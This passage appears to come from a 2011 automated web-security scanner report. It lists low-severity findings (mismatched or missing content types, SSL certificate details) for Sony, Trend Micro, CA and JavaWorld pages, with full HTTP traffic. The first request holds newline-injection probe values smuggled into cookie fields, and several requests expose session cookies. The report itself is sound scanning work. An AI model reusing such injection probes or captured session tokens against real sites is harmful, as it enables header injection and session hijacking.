Cookie: CompareGrid=; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

20.3. https://store.trendmicro.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://store.trendmicro.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000

Response

HTTP/1.1 200 OK
ETag: "37e-4b6b21a0"
Content-Type: text/plain
Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=21646;ecid=97070579830,0)
Content-Length: 894
Date: Thu, 02 Jun 2011 21:05:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app93
Accept-Ranges: bytes

..............h.......(....... ...............H...H...........................................................VVW        
       
       
                                                                                       .....tOL+.        
       
       
                                       ...Q.        

...[SNIP]...

20.4. http://wd.sharethis.com/api/getCount2.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 17:46:04 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 270

(function(){stButtons.processCB({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\
...[SNIP]...

20.5. https://www.ca.com/images/icons/checkmark.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.ca.com
Path:   /images/icons/checkmark.gif

Issue detail

The response contains the following Content-type statement: Content-Type: image/gif. The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/icons/checkmark.gif HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Mon, 01 Mar 2010 16:18:10 GMT
Accept-Ranges: bytes
ETag: "d4c6ebc85ab9ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:52 GMT
Content-Length: 1046

.PNG
.
...IHDR.............a.......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE...@.9<.6=.6...............C.=J.D......A.;s.o{.wA.:7.0;.4p.kH.A.........b.^e.a...Q.K..
...[SNIP]...

20.6. http://www.javaworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.javaworld.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=UTF-8. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=50.23.123.106.1315331151623899; CP=null*; __utma=51115954.1360305783.1315349155.1315349155.1315349155.1; __utmb=51115954.1.10.1315349155; __utmc=51115954; __utmz=51115954.1315349155.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=acegisecurity; __switchTo5x=31; __unam=80e81ea-13240eb6f64-4c95886-1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:46:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Oct 2008 19:34:55 GMT
ETag: "73408d-47e-4584a4fb615c0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

21. Content type is not specified
There are 4 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


21.1. http://www.javalobby.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcalXcWOWKw_8jKx4-it; __utma=125574289.255423471.1315349166.1315349166.1315349166.1; __utmb=125574289; __utmc=125574289; __utmz=125574289.1315349166.1.1.utmccn=(organic)|utmcsr=google|utmctr=acegisecurity|utmcmd=organic; __qca=P0-26411862-1315349166480

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
ETag: "+Rv4b+Thyy2"
Last-Modified: Fri, 18 Feb 2005 16:02:25 GMT
Cache-Control: max-age=5
Expires: Tue, 06 Sep 2011 17:55:43 GMT
Content-Length: 1406
Date: Tue, 06 Sep 2011 17:55:38 GMT

..............h.......(....... ....................................N8..si..}b..tn..._...g...h...v.......................................................................................................
...[SNIP]...

21.2. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1

Request

GET /Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353083271

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"574-1314988493617"
Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT
Content-Length: 574
Date: Tue, 06 Sep 2011 18:51:16 GMT

GIF89a.......DDD.rVw.....-s....y~r..q.>.KKK...spaf..Id...W....UG..L?u.!l....WVV..R)....p...........|..)........j..&....a,..w.._..HV..}.'fff...dmW......?.......P..{..^..r..x..6.iW.yH.....u.....M`..\bh.
...[SNIP]...

21.3. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1

Request

GET /Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353081761

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"79-1314988493992"
Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT
Content-Length: 79
Date: Tue, 06 Sep 2011 18:51:15 GMT

GIF89a...................!.......,.......... ............s.M.| F.Y...m.......;

21.4. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1

Request

GET /Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.8,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":5,"lc":{"d0":{"v":5,"s":true}},"f":1315353359267,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353359592

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"74-1314988493664"
Last-Modified: Fri, 02 Sep 2011 18:34:53 GMT
Content-Length: 74
Date: Tue, 06 Sep 2011 18:55:51 GMT

GIF89a.......DDD...!.......,..........!.......d.:..L.Q.m.......Y.U.:r5s..;

22. SSL certificate
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



22.1. https://store.trendmicro.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  store.trendmicro.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Sun Apr 10 18:00:00 GMT-06:00 2011
Valid to:  Tue Apr 10 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

22.2. https://www.ca.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ca.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Oct 11 18:00:00 GMT-06:00 2010
Valid to:  Wed Oct 12 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036
